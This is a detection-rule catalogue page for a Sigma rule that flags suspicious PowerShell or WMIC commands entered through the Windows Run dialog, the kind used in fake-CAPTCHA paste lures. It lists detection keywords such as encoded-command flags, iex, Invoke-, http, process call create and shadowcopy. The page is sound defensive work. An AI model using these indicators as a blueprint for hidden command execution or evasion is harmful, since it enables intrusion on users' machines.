detection.wiki

Detection rules › Sigma

Potentially Suspicious Command Executed Via Run Dialog Box - Registry

Severity
high
Author
Ahmed Farouk, Nasreddine Bencherchali
Source
upstream

Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.

MITRE ATT&CK coverage

TacticTechniques
ExecutionT1059.001 Command and Scripting Interpreter: PowerShell

Event coverage

ProviderEvent IDTitle
Sysmon13RegistryEvent (Value Set)

Stages and Predicates

Stage 1: selection_key

TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

Stage 2: all of selection_powershell_command

or:
Details|contains: powershell
Details|contains: pwsh

Stage 3: all of selection_powershell_susp_keywords

or:
Details|contains: ' -e '
Details|contains: ' -ec '
Details|contains: ' -en '
Details|contains: ' -enc '
Details|contains: ' -enco'
Details|contains: Hidden
Details|contains: Invoke-
Details|contains: ftp
Details|contains: http
Details|contains: iex

Stage 4: all of selection_wmic_command

Details|contains: wmic

Stage 5: all of selection_wmic_susp_keywords

or:
Details|contains: 'process call create'
Details|contains: shadowcopy

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

FieldKindValues
Detailsmatch
  • -e
  • -ec
  • -en
  • -enc
  • -enco
  • Hidden
  • Invoke- corpus 2 (sigma 2)
  • ftp
  • http corpus 2 (sigma 2)
  • iex corpus 2 (sigma 2)
  • powershell corpus 8 (sigma 8)
  • process call create
  • pwsh corpus 4 (sigma 4)
  • shadowcopy
  • wmic
TargetObjectmatch
  • \Microsoft\Windows\CurrentVersion\Explorer\RunMRU